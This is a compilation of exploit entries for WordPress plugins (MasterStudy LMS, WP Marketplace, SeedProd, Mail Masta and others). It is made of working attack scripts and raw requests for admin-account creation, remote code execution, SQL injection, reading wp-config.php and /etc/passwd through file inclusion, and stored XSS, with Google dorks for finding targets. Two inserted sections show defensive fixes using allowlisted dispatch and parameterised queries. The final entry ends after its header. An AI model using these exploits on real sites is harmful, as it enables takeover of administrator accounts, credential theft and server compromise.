
# Exploit Title: WordPress MDC Private Message Persistent XSS
# Date: 8/20/15
# Exploit Author: Chris Kellum
# Vendor Homepage: http://medhabi.com/
# https://wordpress.org/plugins/mdc-private-message/
# Version: 1.0.0



=====================
Vulnerability Details
=====================

The 'message' field doesn't sanitize input, allowing a less privileged user (Editor, Author, etc.)
to execute an XSS attack against an Administrator.

Proof of Concept: 

Place <script>alert('Hello!')</script> in the message field of a private message and then submit.

Open the message and the alert window will fire.

===================
Disclosure Timeline
===================

8/16/15 - Vendor notified.
8/19/15 - Version 1.0.1 released.
8/20/15 - Public Disclosure.
            
# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
# Date: 16.02.2022
# Author: Numan Türle
# CVE: CVE-2022-0441
# Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
# Version: <2.7.6
# https://www.youtube.com/watch?v=SI_O6CHXMZk
# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed


POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Content-Type: application/json
Content-Length: 339

{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}
            
# Exploit Title:  Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
# Google Dork: inurl:/user-public-account
# Date: 2023-09-04
# Exploit Author: Revan Arifio
# Vendor Homepage: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
# Version: <= 3.0.17
# Tested on: Windows, Linux
# CVE : CVE-2023-4278

import requests
import os
import re
import time

banner = """
   _______      ________    ___   ___ ___  ____        _  _ ___ ______ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \|___ \      | || |__ \____  / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) |  / / (_) |
 | |      \ \/ / |  __|______/ /| | | |/ / |__ <______|__   _/ /  / / > _ < 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |        | |/ /_ / / | (_) |
  \_____|   \/   |______|  |____|\___/____|____/         |_|____/_/   \___/ 
                                                                            
======================================================================================================
|| Title            : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation       ||
|| Author           : https://github.com/revan-ar                                                   ||
|| Vendor Homepage  : https://wordpress.org/plugins/masterstudy-lms-learning-management-system/     ||
|| Support          : https://www.buymeacoffee.com/revan.ar                                         ||
======================================================================================================

"""


print(banner)

# get nonce
def get_nonce(target):
    open_target = requests.get("{}/user-public-account".format(target))
    search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
    # re.search returns None when the page has no nonce; indexing it would crash
    if search_nonce is not None:
        return search_nonce[1]
    print("Failed when getting Nonce :p")
    return None



# privilege escalation
def privesc(target, nonce, username, password, email):

    req_data = {
        "user_login":"{}".format(username),
        "user_email":"{}".format(email),
        "user_password":"{}".format(password),
        "user_password_re":"{}".format(password),
        "become_instructor":True,
        "privacy_policy":True,
        "degree":"",
        "expertize":"",
        "auditory":"",
        "additional":[],
        "additional_instructors":[],
        "profile_default_fields_for_register":[],
        "redirect_page":"{}/user-account/".format(target)
        }

    start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)

    if start.status_code == 200:
        print("[+] Exploit Success !!")
    else:
        print("[+] Exploit Failed :p")



# URL target
target = input("[+] URL Target: ")
print("[+] Starting Exploit")
plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
int_version = plugin_version[1].replace(".", "")
time.sleep(1)

if int(int_version) < 3018:
    print("[+] Target is Vulnerable !!")
    # Credential
    email =  input("[+] Email: ")
    username =  input("[+] Username: ")
    password =  input("[+] Password: ")
    time.sleep(1)
    print("[+] Getting Nonce...")
    nonce = get_nonce(target)
    # Get Nonce
    if nonce is not None:
        print("[+] Success Getting Nonce: {}".format(nonce))
        time.sleep(1)
        # Start PrivEsc
        privesc(target, nonce, username, password, email)
    # ----------------------------------
    
else:
    print("[+] Target is NOT Vulnerable :p")
            
#!/usr/bin/python
#
# Exploit Name: WP Marketplace 2.4.0 Remote Command Execution
#
# Vulnerability discovered by Kacper Szurek (http://security.szurek.pl)
#
# Exploit written by Claudio Viviani
#
#
#
# --------------------------------------------------------------------
#
# The vulnerable function is located on "wpmarketplace/libs/cart.php" file:
#
# function ajaxinit(){
#     if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
#	    if(function_exists($_POST['execute']))
#		    call_user_func($_POST['execute'],$_POST);
#	    else
#		    echo __("function not defined!","wpmarketplace");
#	    die();
#	  }
#}
#
# Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook).
# wpmp_pp_ajax_call() call functions by call_user_func() through POST data:
#
#         if (function_exists($_POST['execute']))
#             call_user_func($_POST['execute'], $_POST);
#         else
#         ...
#         ...
#         ...
#
# $_POST data needs to be an array
#
#
# The wordpress function wp_insert_user is perfect:
#
# http://codex.wordpress.org/Function_Reference/wp_insert_user
#
# Description
#
# Insert a user into the database.
#
# Usage
#
# <?php wp_insert_user( $userdata ); ?>
#
# Parameters
#
# $userdata
#     (mixed) (required) An array of user data, stdClass or WP_User object.
#        Default: None
#
#
#
# Evil POST Data (Add new Wordpress Administrator):
#
# action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
#
# ---------------------------------------------------------------------
#
# Dork google:  index of "wpmarketplace"
#
# Tested on WP Marketplace 2.4.0 version with BackBox 3.x and python 2.6
#
# Http connection
import urllib, urllib2, socket
# System and file checks (os is needed by checkfile)
import sys, os
# String manipulator
import string, random
# Args management
import optparse

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    else:
        return url

# Check if file exists and is readable
def checkfile(file):
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file

def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))

banner = """
    ___ ___               __                                         
   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.           
   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|           
   |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|           
   |:      |                |__|                                     
   |::.|:. |                                                         
   `--- ---'                                                         
       ___ ___            __          __         __                  
      |   Y   .---.-.----|  |--.-----|  |_.-----|  .---.-.----.-----.
      |.      |  _  |   _|    <|  -__|   _|  _  |  |  _  |  __|  -__|
      |. \_/  |___._|__| |__|__|_____|____|   __|__|___._|____|_____|
      |:  |   |                           |__|                       
      |::.|:. |                                                      
      `--- ---'                                                      
                                                          WP Marketplace
                                                      R3m0t3 C0d3 Ex3cut10n
                                                         (Add WP Admin)
                                                             v2.4.0

                               Written by:

                             Claudio Viviani

                          http://www.homelab.it

                             info@homelab.it
                         homelabit@protonmail.ch

                   https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                    https://plus.google.com/+HomelabIt1/
           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)

host = checkurl(options.target)
timeout = options.timeout

print(banner)

socket.setdefaulttimeout(timeout)

username = id_generator()
pwd = id_generator()

body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call',
                         'execute' : 'wp_insert_user',
                         'user_login' : username,
                         'user_pass' : pwd,
                         'role' : 'administrator'})

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

print "[+] Tryng to connect to: "+host
try:
    req = urllib2.Request(host+"/", body, headers)
    response = urllib2.urlopen(req)
    html = response.read()

    if html == "":
       print("[!] Account Added")
       print("[!] Location: "+host+"/wp-login.php")
       print("[!] Username: "+username)
       print("[!] Password: "+pwd)
    else:
       print("[X] Exploitation Failed :(")

except urllib2.HTTPError as e:
    print("[X] "+str(e))
except urllib2.URLError as e:
    print("[X] Connection Error: "+str(e))
            
# Exploit Title: WP Marketplace 2.4.0 Arbitrary File Download
# Date: 26-10-2014
# Software Link: https://wordpress.org/plugins/wpmarketplace/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9013 and CVE-2014-9014

1. Description

Anyone can run user defined function because of call_user_func.

File: wpmarketplace\libs\cart.php

function ajaxinit(){
if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
	if(function_exists($_POST['execute']))
		call_user_func($_POST['execute'],$_POST);
	else
		echo __("function not defined!","wpmarketplace");
	die();
	}
}

http://security.szurek.pl/wp-marketplace-240-arbitrary-file-download.html

2. Proof of Concept

<?php
$file =  '../../../wp-config.php';
$url = 'http://wordpress-url/';
$user = 'userlogin';
$email = 'useremail@email.email';
$pass = 'password';
$cookie = "/cookie.txt";

$ckfile = dirname(__FILE__) . $cookie;
// CURLOPT_COOKIEJAR expects a file name, not a file handle
touch($ckfile) or die("Cannot create cookie file");

// Register
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url.'?checkout_register=register');
curl_setopt($ch, CURLOPT_COOKIEJAR, $ckfile);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,
    CURLOPT_POSTFIELDS,
    array(
        'register_form' => 'register',
        'reg[user_login]' => $user,
        'reg[user_email]' => $email,
        'reg[user_pass]' => $pass
    ));
$content = curl_exec($ch);
if (!preg_match("/success/i", $content)) {
    die("Cannot register");
}
// Log in
curl_setopt($ch, CURLOPT_URL, $url.'wp-login.php');
curl_setopt($ch,
    CURLOPT_POSTFIELDS,
    array(
        'log' => $user,
        'pwd' => $pass,
        'wp-submit' => 'Log%20In'
    ));
$content = curl_exec($ch);
if (!preg_match('/adminmenu/i', $content)) {
    die("Cannot login");
}
// Add subscriber as plugin admin
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,
    CURLOPT_POSTFIELDS,
    array(
        'action' => 'wpmp_pp_ajax_call',
        'execute' => 'wpmp_save_settings',
        '_wpmp_settings[user_role][]' => 'subscriber'
    ));
$content = curl_exec($ch);
if (!preg_match('/Settings Saved Successfully/i', $content)) {
    die("Cannot set role");
}
// Request nonce
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,
    CURLOPT_POSTFIELDS,
    array(
        'action' => 'wpmp_pp_ajax_call',
        'execute' => 'wpmp_front_add_product'
    ));
$content = curl_exec($ch);
preg_match('/name="__product_wpmp" value="([^"]+)"/i', $content, $nonce);
if (strlen($nonce[1]) < 2) {
    die("Cannot get nonce");
}
// Set file to download
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,
    CURLOPT_POSTFIELDS,
    array(
        '__product_wpmp' => $nonce[1],
        'post_type' => 'wpmarketplace',
        'id' => '123456',
        'wpmp_list[base_price]' => '0',
        'wpmp_list[file][]' => $file
    ));
$content = curl_exec($ch);
header("Location: ".$url."?wpmpfile=123456");

3. Solution:

Update to version 2.4.1

https://downloads.wordpress.org/plugin/wpmarketplace.2.4.1.zip
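Both WP Marketplace reports above hinge on `ajaxinit()` calling whatever PHP function the `execute` parameter names: `wp_insert_user` to create an administrator in the first, `wpmp_save_settings` from a subscriber account in the second. The following is an added example, not WP Marketplace code, of the dispatch pattern that closes this: the action name is resolved through an explicit table that also records the capability each action needs, a per-user, per-action token is verified, and any name outside the table is refused. The handlers, the capability names, the token scheme and the two sample users are assumptions; the request body is the one quoted in the first report.

```python
"""Allowlisted AJAX dispatch in place of call_user_func($_POST['execute'])."""
import hashlib
import hmac
from urllib.parse import parse_qs

SECRET = b"constructed-site-secret"  # a real site would use its own salt/secret


class Forbidden(Exception):
    """Raised for any request the dispatcher will not run."""


def make_token(user_id, action):
    msg = f"{user_id}:{action}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[:16]


# --- handlers (assumed stand-ins for the plugin's own functions) -----------
def add_product(user, post):
    return {"product": post.get("name", ""), "owner": user["id"]}


def save_settings(user, post):
    return {"saved": post.get("_wpmp_settings[user_role][]", "")}


# The only names a request can reach, each with the capability it requires.
# wp_insert_user, system, file_put_contents ... are simply not in the table.
ACTIONS = {
    "wpmp_front_add_product": (add_product, "edit_posts"),
    "wpmp_save_settings": (save_settings, "manage_options"),
}


def dispatch(user, post):
    name = post.get("execute", "")
    if name not in ACTIONS:
        raise Forbidden(f"unknown action {name!r}")
    handler, capability = ACTIONS[name]
    token = str(post.get("_wpnonce", ""))
    if not hmac.compare_digest(make_token(user["id"], name).encode(), token.encode()):
        raise Forbidden("missing or invalid token")
    if capability not in user["caps"]:
        raise Forbidden(f"{capability} required")
    return handler(user, post)


def parse_post(body):
    """application/x-www-form-urlencoded body -> flat dict (first value wins)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def try_dispatch(user, post):
    """(True, result) or (False, reason) so callers can log the refusal."""
    try:
        return True, dispatch(user, post)
    except Forbidden as exc:
        return False, str(exc)


# Constructed users, and the POST body from the first report above.
ADMIN = {"id": 1, "caps": {"manage_options", "edit_posts"}}
SUBSCRIBER = {"id": 7, "caps": {"read"}}
REPORTED_BODY = ("action=wpmp_pp_ajax_call&execute=wp_insert_user"
                 "&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator")

if __name__ == "__main__":
    print(try_dispatch(SUBSCRIBER, parse_post(REPORTED_BODY)))
    good = {"execute": "wpmp_save_settings",
            "_wpnonce": make_token(ADMIN["id"], "wpmp_save_settings"),
            "_wpmp_settings[user_role][]": "subscriber"}
    print(try_dispatch(SUBSCRIBER, good), try_dispatch(ADMIN, good))
```

The order of the checks matters less than the fact that all three exist: the table stops arbitrary function calls, the token stops cross-site submissions, and the capability check stops the second report's subscriber-level settings change.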
            
# Exploit Title: Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting
# Date: 2020-06-22
# Vendor Homepage: https://www.seedprod.com/
# Vendor Changelog: https://wordpress.org/plugins/coming-soon/#developers
# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-coming-soon-page-maintenance-mode-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 5.1.1 and below
# CVE : CVE-2020-15038

1. Description

Coming Soon Page, Under Construction & Maintenance Mode by SeedProd is a popular WordPress Plugin with over 1 million active installations. The Headline field under the Page Settings section along with other fields in the plugin settings were found to be vulnerable to stored XSS, which gets triggered when the Coming Soon page is displayed (both in preview mode and live). All WordPress websites using Coming Soon Page, Under Construction & Maintenance Mode by SeedProd version 5.1.1 and below are affected.

2. Proof of Concept

POST /wp-admin/options.php HTTP/1.1
Host: localhost:10004
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:10004/wp-admin/admin.php?page=seed_csp4
Content-Type: application/x-www-form-urlencoded
Content-Length: 636
Origin: http://localhost:10004
Connection: close
Cookie: wordpress_7f1e0e8dff8818d1c2f579415daff8c7=jinson%7C1593950372%7C4GRNHaGPf0Fgg4gDEpeoNwijwEWzc3D3eVOlrvXniBi%7Cb9d2e047395f59871a0900e390bbd3d695bc5da3afb334da3d0ef5e8bf0c2f1b; wordpress_a024acb662ffd2f30d002a94ed1ea95c=jinson%7C1592914794%7CCgXYWBOtHL4ad8HOoBAQX49z08S9twTuGYVtVWqIbFp%7C01f69b63f0019268e8a42d1cefd95cd451b8ae990337af407b1caf9cb3fa99e5; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_7f1e0e8dff8818d1c2f579415daff8c7=jinson%7C1593950372%7C4GRNHaGPf0Fgg4gDEpeoNwijwEWzc3D3eVOlrvXniBi%7Cf1c8b238e06829673fea45a383730caae8b84cd0ac08b6f11fee65cd94cb8c16; PHPSESSID=44b22ef78b270abbd2351f1d858edb02; wordpress_logged_in_a024acb662ffd2f30d002a94ed1ea95c=jinson%7C1592914794%7CCgXYWBOtHL4ad8HOoBAQX49z08S9twTuGYVtVWqIbFp%7C317cd515fad907c4ae323798cca357f601c29999b20edbe8f9fdad02f35c53f7; wp-settings-time-1=1592745227; cookielawinfo-checkbox-non-necessary=yes; wp-settings-1=imgsize%3Dfull; cookielawinfo-checkbox-necessary=yes
Upgrade-Insecure-Requests: 1

option_page=seed_csp4_settings_content&action=update&_wpnonce=faced0b8ff&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dseed_csp4&seed_csp4_settings_content%5Bstatus%5D=1&seed_csp4_settings_content%5Blogo%5D=&seed_csp4_settings_content%5Bheadline%5D=%3Cscript%3Ealert%28%22Stored+XSS+in+Page+Headline%22%29%3C%2Fscript%3E&seed_csp4_settings_content%5Bdescription%5D=Proof+of+Concept&seed_csp4_settings_content%5Bfooter_credit%5D=0&submit=Save+All+Changes&seed_csp4_settings_content%5Bfavicon%5D=&seed_csp4_settings_content%5Bseo_title%5D=&seed_csp4_settings_content%5Bseo_description%5D=&seed_csp4_settings_content%5Bga_analytics%5D=

3. Timeline

Vulnerability reported to the SeedProd team – June 22, 2020
Version 5.1.2 containing the fix to the vulnerability released – June 24, 2020
            
# Exploit Title: Wordpress MailChimp Subscribe Forms Remote Code Execution
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/mailchimp-subscribe-sm/
# Software Link: https://downloads.wordpress.org/plugin/mailchimp-subscribe-sm.1.1.zip
# Version: 1.1
# Tested on: Apache 2.2.22, PHP 5.3.10
# OSVDB ID : http://www.osvdb.org/show/osvdb/121081
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7935
# Category: webapps

1. Description

Remote Code Execution via email field.

2. Proof of Concept

POST Request

sm_email=<?php echo 'Current PHP version: '. phpversion();?>&submit=

When the admin user checks the subscribers list, the PHP code is executed.

3. Solution

Fixed in version 1.2
            
source: https://www.securityfocus.com/bid/59932/info

The Mail On Update plugin for WordPress is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

Mail On Update 5.1.0 is vulnerable; prior versions may also be affected. 

<html><form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update" method="post"
class="button-primary">
<input name="mailonupdate_mailto" type="hidden" value="example0 () example com
example1 () example com
example2 () example com
example3 () example com
example4 () example com
example5 () example com
example6 () example com
example7 () example com
example8 () example com
example9 () example com
example10 () example com
henri+monkey () nerv fi" />
<input name="submit" type="submit" value="Save"/></form></html>
            
# Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress.
# Date: 02/18/2017
# Exploit Author: Hanley Shun
# Vendor Homepage: https://wpcore.com/plugin/mail-masta
# Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip
# Version: 1.0
# Tested on: Kali Linux x64, Ubuntu 14.04 x64
# CVE : [CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098]


Mail-Masta SQL Injection

Page: ./wp-content/plugins/mail-masta/inc/lists/csvexport.php (Unauthenticated)

GET Parameter: list_id

http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php


csvexport.php:

$list_id=$_GET['list_id'];
global $wpdb;
$mail_subscribers = $wpdb->prefix . "masta_subscribers";
$masta_list = $wpdb->prefix . "masta_list";
$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";
$check_list="SELECT * FROM $masta_list WHERE list_id= $list_id";
$wp_list=$wpdb->get_results($check_sql);
$wp_list_s=$wpdb->get_results($check_list);


Page: ./wp-content/plugins/mail-masta/inc/lists/view-list.php (Requires Wordpress admin)

GET Parameter: filter_list

http://my_wp_app/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1


view-list.php:

global $wpdb;
$list_id = $_GET['filter_list'];
$masta_list = $wpdb->prefix . "masta_list";
$masta_subscribers = $wpdb->prefix . "masta_subscribers";
$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));
$list_subscribers = $wpdb->get_var( $wpdb->prepare("SELECT COUNT( `list_id` ) FROM $masta_subscribers WHERE list_id= $list_id AND status=1",$query));


Page: ./wp-content/plugins/mail-masta/inc/campaign/count_of_send.php (Requires Wordpress admin)

POST Parameter: camp_id

http://my_wp_app/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/www/html/wordpress/wp-load.php


count_of_send.php:

include($_GET['pl']);
global $wpdb;
$camp_id=$_POST['camp_id'];
$masta_reports = $wpdb->prefix . "masta_reports";
$count=$wpdb->get_results("SELECT count(*) co from  $masta_reports where camp_id=$camp_id and status=1");


Page: ./wp-content/plugins/mail-masta/inc/campaign_save.php (Requires Wordpress admin)

POST Parameter: list_id

campaign_save.php:

$list_id=$_POST['list_id'];
$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");


POST /wp-admin/admin-ajax.php?id= HTTP/1.1

...snip...

action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1
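Every query quoted above splices `$list_id` or `$camp_id` into the SQL text, and the two `view-list.php` calls wrap that already-spliced string in `$wpdb->prepare()`, which therefore has nothing left to bind. The following is an added example, not Mail Masta code, that runs the same COUNT against an in-memory SQLite table both ways: the vulnerable way with string formatting, and the safe way with an integer cast followed by a bound parameter, which is what `$wpdb->prepare("... WHERE list_id = %d", $list_id)` does in WordPress. The table rows are constructed; the payload is the report's `list_id` value.

```python
"""String-built query versus an integer placeholder for list_id (added example)."""
import sqlite3
from urllib.parse import unquote_plus

# list_id=0+OR+1%3D1 from the csvexport.php URL above, URL-decoded.
REPORTED_PAYLOAD = unquote_plus("0+OR+1%3D1")


def make_db():
    """Constructed subscriber table: lists 1, 2 and 3 with four rows total."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_masta_subscribers (id INTEGER, list_id INTEGER, email TEXT)")
    db.executemany(
        "INSERT INTO wp_masta_subscribers VALUES (?, ?, ?)",
        [(1, 1, "a@example.com"), (2, 1, "b@example.com"),
         (3, 2, "c@example.com"), (4, 3, "d@example.com")],
    )
    return db


def vulnerable_count(db, list_id):
    """Mirrors campaign_save.php: the parameter becomes part of the SQL text."""
    sql = f"SELECT count(id) FROM wp_masta_subscribers WHERE list_id={list_id}"
    return db.execute(sql).fetchone()[0]


def safe_count(db, list_id):
    """Cast, then bind: anything that is not an integer never reaches SQL."""
    try:
        list_id = int(list_id)
    except (TypeError, ValueError):
        raise ValueError(f"list_id must be an integer, got {list_id!r}")
    sql = "SELECT count(id) FROM wp_masta_subscribers WHERE list_id=?"
    return db.execute(sql, (list_id,)).fetchone()[0]


def demo():
    """What each variant yields for a normal id and for the report's payload."""
    db = make_db()
    result = {
        "normal_vulnerable": vulnerable_count(db, "1"),
        "normal_safe": safe_count(db, "1"),
        "payload_vulnerable": vulnerable_count(db, REPORTED_PAYLOAD),
    }
    try:
        safe_count(db, REPORTED_PAYLOAD)
        result["payload_safe"] = "executed"
    except ValueError:
        result["payload_safe"] = "rejected"
    return result


if __name__ == "__main__":
    print(demo())
```

The same two-step shape applies to `camp_id` in `count_of_send.php`; for free-text columns the cast is replaced by binding alone (`%s` in `$wpdb->prepare()`), but the value must still never be concatenated into the query string before the call.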
            
# Exploit Title: WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)
# Date: 2021-08-24
# Exploit Author: Matheus Alexandre [Xcatolin]
# Software Link: https://downloads.wordpress.org/plugin/mail-masta.zip
# Version: 1.0

WordPress Plugin Mail Masta is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input.

* Make sure to modify the wordlist path to your preferred wordlist. You can also download the one I used from GitHub:
https://github.com/Xcatolin/Personal-Exploits/

#!/usr/bin/python

# Exploit for the Wordpress plugin mail-masta 1.0 LFI vulnerability

import requests
from requests.exceptions import ConnectionError

class bcolors:
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    ITALIC   = '\33[3m'

print(bcolors.BOLD + """\
                 __  __      _ _     __  __         _                  
                |  \/  |__ _(_) |___|  \/  |__ _ __| |_ __ _           
                | |\/| / _` | | |___| |\/| / _` (_-<  _/ _` |          
                |_|  |_\__,_|_|_|   |_|  |_\__,_/__/\__\__,_|          
  _                 _   ___ _ _       ___         _         _          
 | |   ___  __ __ _| | | __(_) |___  |_ _|_ _  __| |_  _ __(_)___ _ _  
 | |__/ _ \/ _/ _` | | | _|| | / -_)  | || ' \/ _| | || (_-< / _ \ ' \ 
 |____\___/\__\__,_|_| |_| |_|_\___| |___|_||_\__|_|\_,_/__/_\___/_||_|

			                           
					|_   .  \_/ _ _ |_ _ |. _  
					|_)\/.  / \(_(_||_(_)||| ) 
					   /                       
     """ + bcolors.ENDC)

endpoint = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl="
valid = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"


print (bcolors.WARNING + "[+] Insert the target including the WordPress instance:" + bcolors.ENDC)
print (bcolors.ITALIC + "ex: http://target.com/wordpress\n" + bcolors.ENDC)
target = raw_input("~# ")

print (bcolors.WARNING + "[*] Checking if the target is alive..." + bcolors.ENDC)
try:
	request = requests.get(target)
except ConnectionError:
	print (bcolors.FAIL + "[X] Target not available. Please check the URL you've entered." + bcolors.ENDC)
	exit(1)
else:
	print (bcolors.OKGREEN + "[!] Target up and running!\n" + bcolors.ENDC)

print (bcolors.WARNING + "[*] Checking if the Mail-Masta endpoint is vulnerable..." + bcolors.ENDC)
try:
	response = requests.get(target + valid)
except len(response.content) < 1000 :
	print (bcolors.FAIL + "[X] Endpoint not vulnerable." + bcolors.ENDC)
	exit(1)
else:
	print (bcolors.OKGREEN + "[!] Endpoint vulnerable!\n" + bcolors.ENDC)

print (bcolors.WARNING + "[*] Fuzzing for files in the system..." + bcolors.ENDC)
wordlist='wordlist.txt' ## Change here
lines=open(wordlist, "r").readlines()

for i in range(0, len(lines)):
	word=lines[i].replace("\n","")
	response = requests.get(target + endpoint + word)
	if len(response.content) > 500 :
		print (bcolors.OKGREEN + "[!] " + bcolors.ENDC) + "File",word,"found!"
            
[+] Date: [23-8-2016]
[+] Author: Guillermo Garcia Marcos
[+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip
[+] Title: Mail Masta WP Local File Inclusion
[+] info: Local File Inclusion 

A file inclusion vulnerability allows an attacker to include a file, usually by exploiting a "dynamic file inclusion" mechanism implemented in the target application. The vulnerability occurs because user-supplied input is used without proper validation.

Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);

Source: /inc/lists/csvexport.php
Line 5: include($_GET['pl']);


This looks like a perfect place to try for LFI. If an attacker is lucky enough and, instead of selecting the appropriate page from an array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.


Typical proof-of-concept would be to load passwd file:


http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
            
# # # # # 
# Exploit Title: WordPress Plugin Mac Photo Gallery v3.0 - Arbitrary File Download
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.apptha.com/
# Software: https://www.apptha.com/category/extension/Wordpress/Mac-Photo-Gallery
# Demo: http://www.apptha.com/demo/mac-photo-gallery
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# Exploit :
# http://localhost/[PLUGIN_PATH]/macdownload.php?albid=../../../wp-load.php
# Etc..
# # # # #
            
# Exploit Title: Wordpress Loco Translate (Version 2.2.1) Plugin LFI
# Google Dork: N/A
# Date: 03 / 26 / 2019
# Exploit Author: Ali S. Ahmad (S4R1N)
# Vendor Homepage: https://localise.biz/
# Software Link: https://wordpress.org/plugins/loco-translate/
# Version: (Version 2.2.1)
